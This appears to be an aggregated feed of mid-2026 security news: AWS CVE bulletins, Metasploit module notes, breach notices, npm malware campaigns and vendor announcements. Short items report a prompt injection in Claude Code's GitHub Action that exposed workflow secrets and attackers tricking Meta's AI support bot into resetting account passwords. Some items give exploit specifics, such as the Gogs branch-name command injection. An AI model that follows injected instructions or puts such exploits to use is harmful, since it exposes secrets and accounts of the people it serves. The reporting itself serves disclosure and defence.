CVE-2026-5707: Unsanitized input in an OS Command in the virtual desktop session name handling in AWS Research and Engineering Studio (RES) version 2025.03 through 2025.12.01 might allow a remote authenticated actor to execute arbitrary commands as root on the virtual desktop host via a crafted session name.
CVE-2026-5708: Improper control of user-modifiable attributes in the session...
https://aws.amazon.com/security/security-bulletins/rss/2026-014-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with FreeRTOS-Plus-TCP - MAC Address Validation Bypass and ICMP Echo Reply Integer Underflow
Bulletin ID: 2026-021-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/29 12:00 PM PDT
Description:
FreeRTOS-Plus-TCP is a scalable, open source, and thread-safe TCP/IP stack for FreeRTOS. - CVE-2026-7422: Insufficient packet validation in the IPv4 and IPv6 receive paths allows an adjacent network device to send a packet that bypasses checksum and minimum-size validation by spoofing the Ethernet source MAC address to match one of the target device's own registered endpoints. - CVE-2026-7423: Integer underflow in the ICMP and ICMPv6 echo reply handlers allows an adjacent network device to cause a denial of service (device crash) when outgoing ping support is enabled, because header sizes are subtracted from a packet length field without validating the...
https://aws.amazon.com/security/security-bulletins/rss/2026-021-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security Findings in SageMaker Python SDK
Bulletin ID: 2026-004-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/02/02 14:30 PM PST
Description:
CVE-2026-1777 - Exposed HMAC in SageMaker Python SDK SageMaker Python SDK's remote functions feature uses a per‑job HMAC key to protect the integrity of serialized functions, arguments, and results stored in S3. We identified an issue where the HMAC secret key is stored in environment variables and disclosed via the DescribeTrainingJob API. This allows third parties with DescribeTrainingJob permissions to extract the key, forge cloud-pickled payloads with valid HMACs, and overwrite S3 objects.
CVE-2026-1778 - Insecure TLS Configuration in SageMaker Python SDK SageMaker Python SDK is an open source library for training and deploying machine learning...
https://aws.amazon.com/security/security-bulletins/rss/2026-004-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with Amazon SageMaker Python SDK - Model artifact integrity verification issues (CVE-2026-8596 & CVE-2026-8597)
Bulletin ID: 2026-031-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/14/2026 13:00 PM PDT
Description:
Amazon SageMaker Python SDK is an open-source library for training and deploying machine learning models on Amazon SageMaker. The ModelBuilder component simplifies model deployment by automating model artifact preparation and SageMaker model creation.
We identified two issues affecting the model artifact integrity verification mechanism in the ModelBuilder/Serve component: - CVE-2026-8596: We identified a cleartext storage of sensitive information issue in the ModelBuilder/Serve component. When building models using ModelBuilder, the SDK stored an HMAC signing key as a container environment variable (SAGEMAKER_SERVE_SECRET_KEY). This key was returned in...
https://aws.amazon.com/security/security-bulletins/rss/2026-031-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2026-7424 - Integer Underflow in DHCPv6 Sub-Option Parser in FreeRTOS-Plus-TCP
Bulletin ID: 2026-022-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/29 12:20 PM PDT
Description:
FreeRTOS-Plus-TCP is an open-source, scalable TCP/IP stack for FreeRTOS. We identified CVE-2026-7424, where an integer underflow issue in the DHCPv6 sub-option parser could allow an adjacent network user to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (IP task freeze requiring hardware reset).
Impacted versions: FreeRTOS-Plus-TCP >=V4.0.0 AND <=V4.2.5, >=V4.3.0 AND <= V4.4.0
Please refer to the article below for the most up-to-date and complete information related to this AWS Security Bulletin.
https://aws.amazon.com/security/security-bulletins/rss/2026-022-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issues with Amazon Athena ODBC Driver
Bulletin ID: 2026-013-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/03 13:00 PM PDT
Description:
The Amazon Athena ODBC driver implements standard ODBC application program interfaces (APIs). The ODBC driver provides access to Amazon Athena from any C/C++ application. The Amazon Athena ODBC driver provides 64-bit ODBC drivers for Windows, Linux and MAC operating systems.
We identified the following: - CVE-2026-5485: OS command injection in browser-based authentication component (Linux only, fixed in 2.0.5.1) - CVE-2026-35558: Improper neutralization of special elements in authentication components - CVE-2026-35559: Out-of-bounds write in query processing components - CVE-2026-35560: Improper certificate validation in identity provider connection components...
https://aws.amazon.com/security/security-bulletins/rss/2026-013-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2026-11400 and CVE-2026-11401
Bulletin ID: 2026-039-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 06/025/2026 12:15 PM PDT
Description:
Amazon Aurora PostgreSQL a fully managed relational database engine that's compatible with PostgreSQL.
We identified CVE-2026-11400(JDBC) and CVE-2026-11401(Go), an issue in AWS Wrappers for Amazon Aurora PostgreSQL will allow for privilege escalation to rds_superuser role. A low privilege authenticated user can create a crafted function that could be executed with permissions of other Amazon Relational Database Service (RDS) users.
Impacted versions: - AWS Advanced JDBC Wrapper >=3.0.0 and < 4.0.1 - AWS Advanced Go Wrapper release 2026-04-06
Please refer to the article below for the most up-to-date and complete information related to this AWS...
https://aws.amazon.com/security/security-bulletins/rss/2026-039-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fragnesia Local Privilege Escalation report via ESP-in-TCP in the Linux Kernel
Bulletin ID: 2026-029-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/13/2026 18:45 PM PDT
This is an ongoing issue. Information is subject to change. Please refer to our Security Bulletin (ID: 2026-030-AWS) for the most updated patching information.
Description:
Amazon is aware of CVE-2026-46300, a report of an additional privilege escalation issue in the Linux kernel related to the DirtyFrag, copy.fail class of issues (CVE-2026-43284). The proof of concept uses a vector via the loadable module espintcp. Amazon Linux does not provide this module, and is not affected.
As defense in depth we will include a correctness patch to the core networking code to harden against possible similar issues in network protocol implementations that rely on this behavior....
https://aws.amazon.com/security/security-bulletins/rss/2026-029-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2026-6437 - Mount Option Injection in Amazon EFS CSI Driver
Bulletin ID: 2026-016-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/17 11:15 AM PDT
Description:
The Amazon EFS CSI Driver is a Container Storage Interface driver that allows Kubernetes clusters to use Amazon Elastic File System.
We identified CVE-2026-6437, where an actor with PersistentVolume creation privileges can inject arbitrary mount options via two unsanitized fields: the Access Point ID in volumeHandle and the mounttargetip volumeAttribute. In both cases, appending comma-separated values causes the mount utility to parse them as separate mount options.
No AWS service is affected.
Impacted versions: EFS CSI Driver <&equal; v3.0.0
Please refer to the article below for the most up-to-date and complete information related to this AWS...
https://aws.amazon.com/security/security-bulletins/rss/2026-016-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2026-1386 - Arbitrary Host File Overwrite via Symlink in Firecracker Jailer
Bulletin ID: 2026-003-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/01/23 12:30 PM PST
Description:
Firecracker is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services. Firecracker runs in user space and uses the Linux Kernel-based Virtual Machine (KVM) to create microVMs. Each Firecracker microVM is further isolated with common Linux user-space security barriers by a companion program called "jailer". The jailer provides a second line of defense in case a user escapes from the microVM boundaries and it is released at each Firecracker version.
We are aware of CVE-2026-1386, an issue that is related to the Firecracker jailer, which under certain circumstances...
https://aws.amazon.com/security/security-bulletins/rss/2026-003-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
When Open Source is a bit too OpenSeveral fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec <command> and requesting a rebase.Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!New module content (3)Apache ActiveMQ RCE via Jolokia addNetworkConnectorAuthors: dinosn and h00dieType: ExploitPull request: #21497 contributed...
https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-05-06-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing CI/CD in an agentic world: Claude Code Github action case
Microsoft Threat Intelligence identified a prompt injection pathway in Claude Code GitHub Action that allowed access to workflow secrets under specific conditions. This research examines the attack chain, responsible disclosure process, Anthropic's mitigation, and guidance for securing AI-powered CI/CD workflows.
The post Securing CI/CD in an agentic world: Claude Code Github action case appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/05/securing-ci-cd-in-agentic-world-claude-code-github-action-case/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Virginia Is For Cyber
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 5, 2026 – Listen to the podcast Virginia is home to the second largest cybersecurity industry in the country, with around 88,000 cybersecurity workers, according to Cyberseek, a project supported by
The post Virginia Is For Cyber appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/virginia-is-for-cyber/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BCD Travel - 396,313 breached accounts
In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets.
https://haveibeenpwned.com/Breach/BCDTravel
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CSAI Foundation Announces RiskRubric V2 as the Next Key Milestone to Secure the Agentic Control Plane
Deloitte Italy, PointGuardAI, and Tumeryk partner with CSA to evolve the reference framework for assessing the security of AI systems
SEATTLE – June 8, 2026 — Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, today announced the upcoming launch of RiskRubric V2, the next key milestone in expanding the CSAI Foundation's capacity to deliver on its 2026 mission of Securing the Agentic Control Plan...
https://cloudsecurityalliance.org/articles/csai-foundation-announces-riskrubric-v2-as-the-next-key-milestone-to-secure-the-agentic-control-plane
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Updating the taxonomy of failure modes in agentic AI systems: What a year of red teaming taught us
A surge in real-world attacks against agentic AI systems is reshaping how we think about risk. Based on 12 months of red teaming, this update introduces seven new failure modes, from supply chain compromise to goal hijacking, and the practical mitigations teams need now.
The post Updating the taxonomy of failure modes in agentic AI systems: What a year of red teaming taught us appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/04/updating-taxonomy-failure-modes-agentic-ai-systems-year-red-teaming-taught-us/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RiskRubric Updates: AI Risk Assessment for the Agentic Era
RiskRubric, CSA's evidence-based risk rating system for AI technologies, is getting some timely updates. These updates aim to expand AI risk assessment beyond the model layer, reduce blind spots, and address maturing threats.
The upcoming updates to RiskRuric include:
A multi-scanner ecosystem powered by independent partners Deloitte Italy, PointGuard, and Tumeryk.
Expanded assessment coverage beyond AI models to include MCP servers and AI agents.
Modernized evaluation pillars add...
https://cloudsecurityalliance.org/articles/riskrubric-updates-ai-risk-assessment-for-the-agentic-era
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Shai-Hulud Miasma Wave Hits Hundreds of npm Packages
Update, June 5, 2026: As of this date, we have identified a total of 304 components impacted by this malware, expanding on the amount noted in our initial reporting. We will continue to monitor the situation, and we remind users to consult our Sonatype Guide page. Our original blog post continues below.
https://www.sonatype.com/blog/new-shai-hulud-miasma-wave-hits-hundreds-of-npm-packages
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
China-Linked TA4922 Expands Phishing Attacks to U.K., Germany, Italy, and South Africa
https://www.proofpoint.com/us/newsroom/news/china-linked-ta4922-expands-phishing-attacks-uk-germany-italy-and-south-africa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scam Compound Trafficking Victim To Cybercrime Whistleblower: Mohammad Muzahir's Story
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 4, 2026 – Listen to the podcast Popular radio host Kim Komando tells Mohammad Muzahir’s Story on the Komando.com blog. Muzahir grew up in Kashmir, India, the eighth of eight children. He
The post Scam Compound Trafficking Victim To Cybercrime Whistleblower: Mohammad Muzahir’s Story appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/scam-compound-trafficking-victim-to-cybercrime-whistleblower-mohammad-muzahirs-story/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Software supply chain attacks: check your dependencies
Attackers are compromising open-source packages to spread malware. Cyber defenders are asked to review dependencies to reduce risks
https://www.ncsc.gov.uk/blogs/software-supply-chain-attacks-check-your-dependencies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Frontline Workers Twice as Likely to Use Unapproved AI
New research by Mitel has revealed a widening gap between AI adoption and enablement, with limited support and low confidence contributing to the rise of Shadow AI and unapproved AI usage. The State of Workforce Communication report found that while workplace communication is mission-critical, tools are misaligned with how teams execute, forcing employees to quietly […]
The post Frontline Workers Twice as Likely to Use Unapproved AI appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/04/frontline-workers-twice-as-likely-to-use-unapproved-ai/?utm_source=rss&utm_medium=rss&utm_campaign=frontline-workers-twice-as-likely-to-use-unapproved-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DentaQuest - 2,553,599 breached accounts
In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat.
https://haveibeenpwned.com/Breach/DentaQuest
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lazarus Group's Latest: Brandjacking Campaign on npm
TL;DR
Sonatype Security Research is tracking a Lazarus Group npm campaign using dozens of malicious packages to abuse developer trust and deliver follow-on payloads.
The campaign goes beyond typosquatting, relying on brandjacking tactics like suffix addition, embedding, and version mimicry to make packages look ecosystem-adjacent.
Analysis of buffer-utilities shows a malicious dropper that fetches and executes remote payloads, setting the stage for ongoing attacker-controlled intrusions.
Organizations that installed affected packages should remove them, investigate for second-stage activity, and treat impacted systems as potentially compromised.
Sonatype is tracking a Lazarus Group campaign on npm, consisting of dozens of packages, some with up to 500 weekly downloads,...
https://www.sonatype.com/blog/lazarus-groups-latest-brandjacking-campaign-on-npm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 1, June 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 1, June 2026 Qilin Ransomware Attack Targets South Korean Automation Equipment Company New Data Extortion Group Black X Claims Leak of Internal Data from South Korean Plastic Surgery Clinic Nova Ransomware Attack Targets Department of AI at University in Daegu, South […]
https://asec.ahnlab.com/en/93989/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
5 Steps to Turn Your RMF Backlog Into a Continuous ATO: The CSRMC Migration Playbook
Let's be honest about the legacy Risk Management Framework (RMF): for the last decade, achieving an ATO has been less about actual cybersecurity and more about creative writing. We built three-year "snapshot" PDFs, crossed our fingers, and hoped the underlying code didn't rot before the next audit.
https://www.sonatype.com/blog/5-steps-to-turn-your-rmf-backlog-into-a-continuous-ato-the-csrmc-migration-playbook
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
500 Ransomware Statistics For 2026
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 3, 2026 – Read the full story from Bright Defense Ransomware has existed for more than 35 years and remains the fastest-growing category of cybercrime, showing no signs of slowing down, according
The post 500 Ransomware Statistics For 2026 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/500-ransomware-statistics-for-2026/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ComoDoS - Exploiting a Remote Kernel Vulnerability in Comodo Internet Security
Sometimes firewall stops attackers, sometimes attackers stop firewall. analyzing a zero-day vulnerability in Comodo Internet Security's Firewall driver.
https://malwaretech.com/2026/06/exploiting-a-remote-kernel-vulnerability-in-comodo-internet-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Argamal: Malware hidden in hentai games
Kaspersky researchers analyze new Argamal RAT distributed via infected hentai games and allowing the attacker to control the target machine.
https://securelist.com/argamal-rat-distributed-with-hentai-games/119999/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lessons for life: Why children's data is a long-term identity risk
Your child's first data breach may happen before they've even opened a bank account. Here's how to keep their digital life safe.
https://www.welivesecurity.com/en/kids-online/lessons-life-childrens-data-long-term-identity-risk/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Linux Kernel vulnerability Dirty Frag
CVSSv3 Score:
7.9
Linux kernel is impacted by CVE-2026-43284 and CVE-2026-43500 which chained together create the Dirty Frag vulnerability.CVE-2026-43284In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place...
https://fortiguard.fortinet.com/psirt/FG-IR-26-144
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign
A large-scale npm supply chain attack compromised over 90 versions of @redhat-cloud-services packages, silently infecting CI/CD environments and developer systems. The malicious code steals credentials from GitHub, cloud platforms, and local machines, then spreads like a worm by republishing trusted packages. Discover how the attack works, what data is at risk, and the steps you can take to protect your organization.
The post Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/02/preinstall-persistence-inside-red-hat-npm-miasma-credential-stealing-campaign/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The AI Race Is Becoming a Remediation Race
If AI is going to change how we find vulnerabilities, then policy has to address the full cycle of repair.
https://www.sonatype.com/blog/the-ai-race-is-becoming-a-remediation-race
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2)
Unit 42 analyzes npm supply chain evolution post-Shai Hulud. Discover wormable malware, CI/CD persistence, multi-stage attacks and more.
The post The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Build 2026: Securing code, agents, and models across the development lifecycle
Discover how Microsoft enables fast, secure AI development with MDASH and new security capabilities.
The post Microsoft Build 2026: Securing code, agents, and models across the development lifecycle appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/02/microsoft-build-2026-securing-code-agents-and-models-across-the-development-lifecycle/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ESPN Journalist Dan Wetzel On Matt Weiss Hacking Allegations
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 2, 2026 – Listen to the podcast In Dec. 2025, ESPN reported that former University of Michigan co-offensive coordinator and quarterbacks coach Matt Weiss, 42, was indicted in Mar. 2025 for allegedly stealing private videos
The post ESPN Journalist Dan Wetzel On Matt Weiss Hacking Allegations appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/espn-journalist-dan-wetzel-on-matt-weiss-hacking-allegations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Wardriving assessment across Mexico: Preparing for the 2026 World Cup
In the lead-up to the 2026 FIFA World Cup, Kaspersky GReAT experts conducted a wardriving assessment in Mexico City, Monterrey, and Guadalajara to evaluate Wi-Fi hotspot security configurations and potential exposure risks.
https://securelist.com/wardriving-assessment-in-mexico-fifa-world-cup-2026/119996/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor
Operation FlutterBridge is a malvertising campaign targeting macOS users. It distributed the new backdoor FlutterShell, built using the Flutter framework.
The post Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor appeared first on Unit 42.
https://unit42.paloaltonetworks.com/flutterbridge-new-fluttershell-backdoor/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Over 80% of Organizations that Miss 24-Hour Patch Window Report Security Incidents Involving Known Vulnerabilities
Survey of 900+ security leaders shows runtime is the breach battlefield
Even pre-production controls are not stopping known vulnerabilities in the AI age, as 82% of organizations lack real-time visibility into AI runtime behavior.
NEW YORK, June 2, 2026 – The Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, has released the 2026 State of Modern Application & AI Security Report. ...
https://cloudsecurityalliance.org/articles/over-80-of-organizations-that-miss-24-hour-patch-window-report-security-incidents-involving-known-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Inside APAC's malvertising ecosystem: How scams spread through social media ads
Bitdefender Labs has uncovered a large-scale malvertising ecosystem operating across APAC, where scam campaigns are distributed through paid advertising on Meta platforms and quickly generate massive reach.
Key takeaways
* Bitdefender Labs identified 12,000 scam campaigns across 13 APAC countries
* These campaigns generated more than 400,000 ad sightings through paid ads on Meta platforms
* Health and finance are the leading scam categories, together accounting for 37.3% of all campaigns
https://www.bitdefender.com/en-us/blog/labs/inside-the-apac-malvertising-ecosystem
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Red Hat Cloud Services npm Packages Hijacked
A new wave of malicious npm activity has been reported involving multiple packages in the legitimate @redhat-cloud-services namespace.
https://www.sonatype.com/blog/red-hat-cloud-services-npm-packages-hijacked
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers Used Meta's AI Support Bot to Seize Instagram Accounts
The Instagram accounts for the Obama White House and the Chief Master Sergeant of the U.S. Space Force were briefly defaced with pro-Iranian images and messages over the weekend, after instructions began circulating on Telegram showing how to trick Meta's "AI support assistant" bot into resetting account passwords.
https://krebsonsecurity.com/2026/06/hackers-used-metas-ai-support-bot-to-seize-instagram-accounts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IT Security Guru picks for Infosecurity Europe 2026
With Infosecurity Europe kicking off tomorrow, many of us will be fine tuning our schedules and prepping for the festivities to kick off. The Gurus have been busy collecting a selection of unmissable events to help you plan your trip and ensure you get the most out of your visit. Here's a selection of ones […]
The post IT Security Guru picks for Infosecurity Europe 2026 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/it-security-guru-picks-for-infosecurity-europe-2026/?utm_source=rss&utm_medium=rss&utm_campaign=it-security-guru-picks-for-infosecurity-europe-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Building a Digital Fortress: Why Cyber Security Matters More Than Ever
As a society, our reliance on technology has never been greater. From banking and shopping to remote work and healthcare, we have access to information in an instant. As good as technology is at helping us with daily tasks, it also comes with risks. Cybersecurity is no longer a concern for IT departments in a […]
The post Building a Digital Fortress: Why Cyber Security Matters More Than Ever appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/building-digital-fortress-why-cyber-security-matters-more-ever/?utm_source=rss&utm_medium=rss&utm_campaign=building-digital-fortress-why-cyber-security-matters-more-ever
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Nine in Ten Security Leaders Concerned About AI-Generated Code Risks as Salt Security Launches New Governance Tool
The rapid adoption of AI coding assistants is creating a new governance challenge for enterprise security teams, according to research released by Salt Security, which found that nine in ten security leaders are concerned about the security risks associated with AI-generated code. The research, AI Coding Assistants and the New Security Challenge, surveyed 100 IT […]
The post Nine in Ten Security Leaders Concerned About AI-Generated Code Risks as Salt Security Launches New Governance Tool appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/nine-in-ten-security-leaders-concerned-about-ai-generated-code-risks-as-salt-security-launches-new-governance-tool/?utm_source=rss&utm_medium=rss&utm_campaign=nine-in-ten-security-leaders-concerned-about-ai-generated-code-risks-as-salt-security-launches-new-governance-tool
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Containers on fire: from container escapes to supply chain attacks
We break down the primary attack vectors in containerized environments: exposed secrets, privilege misconfigurations, API compromise, and supply chain attacks.
https://securelist.com/container-attack-vectors/120010/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Edmunds - 177,860 breached accounts
In January 2026, the automotive research and car-shopping platform Edmunds was listed by the ShinyHunters hacking group as having been breached. Data purportedly obtained in the incident was later published publicly and included 178k unique email addresses, usernames, passwords, IP addresses, phone numbers and vehicle-related records.
https://haveibeenpwned.com/Breach/Edmunds
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Powered Nmap using ShellGPT
Overview This article examines how pairing ShellGPT — an AI-powered command-line assistant driven by the OpenAI API — with Nmap fundamentally changes the pace and
The post AI Powered Nmap using ShellGPT appeared first on Hacking Articles.
https://www.hackingarticles.in/ai-powered-nmap-using-shellgpt/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Atlas Menu - 63,926 breached accounts
In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes.
https://haveibeenpwned.com/Breach/AtlasMenu
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malicious npm packages abuse dependency confusion to profile developer environments
A dependency confusion campaign leveraged 33 malicious npm packages to collect reconnaissance data from developer and build environments. This report details the attack chain, observed tradecraft, and detection opportunities to help organizations identify and disrupt related activity.
The post Malicious npm packages abuse dependency confusion to profile developer environments appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/05/29/33-malicious-npm-packages-abuse-dependency-confusion-profile-developer-environments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection
Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection.
The post Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/05/29/microsoft-is-named-a-leader-in-the-2026-gartner-magic-quadrant-for-endpoint-protection/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Acumen Cyber and AttackIQ Partner to Strengthen Cyber Defense Validation
Acumen Cyber has announced a strategic partnership with AttackIQ to help organizations continuously validate their cyber defenses against real-world threats and reduce exposure to modern attacks. The partnership combines Acumen Cyber's engineering-led security operations expertise with AttackIQ's Continuous Threat Exposure Management (CTEM) platform. Together, the companies aim to help organizations identify exploitable attack paths, validate […]
The post Acumen Cyber and AttackIQ Partner to Strengthen Cyber Defense Validation appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/29/acumen-cyber-attackiq-cyber-resilience-partnership/?utm_source=rss&utm_medium=rss&utm_campaign=acumen-cyber-attackiq-cyber-resilience-partnership
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
This month in security with Tony Anscombe – May 2026 edition
In this roundup, Tony looks at attacks against Polish water treatment facilities, how AI-directed attacks failed in Mexico, and what Google believes is the first AI-generated zero-day exploit
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-may-2026/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What's in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant
What are the main risks for container environments: vulnerabilities, supply chain attacks, configuration errors; how to improve container security and how Kaspersky Container Security with the KIRA AI assistant can help.
https://securelist.com/container-security-typical-issues/119974/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Charter - 4,851,517 breached accounts
In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated.
https://haveibeenpwned.com/Breach/Charter
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Designing Agentic AI Systems with the ORCHIDEAS Framework
A secure-by-construction approach to nine-pillar agentic AI design, integrated with the Cloud Security Alliance MAESTRO threat modeling framework
Introduction: Security as a Structural Property
Most security failures in software systems come from treating security as something added on top of an otherwise-complete design. A team builds the application, then adds authentication; ships the feature, then writes the audit log; designs the architecture, then performs a penetration ...
https://cloudsecurityalliance.org/articles/designing-agentic-ai-systems-with-the-orchideas-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Inside a 176-Package npm Campaign Built to Beat Your Internal Dependencies
The latest malware campaign uncovered by Sonatype researchers involved 176 malicious npm packages, many published with the exact same version number: 99.99.99.
https://www.sonatype.com/blog/inside-a-176-package-npm-campaign-built-to-beat-your-internal-dependencies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Point Launches AI Agents That Think Like Attackers as Autonomous Exploitation Reaches Critical Threat Level
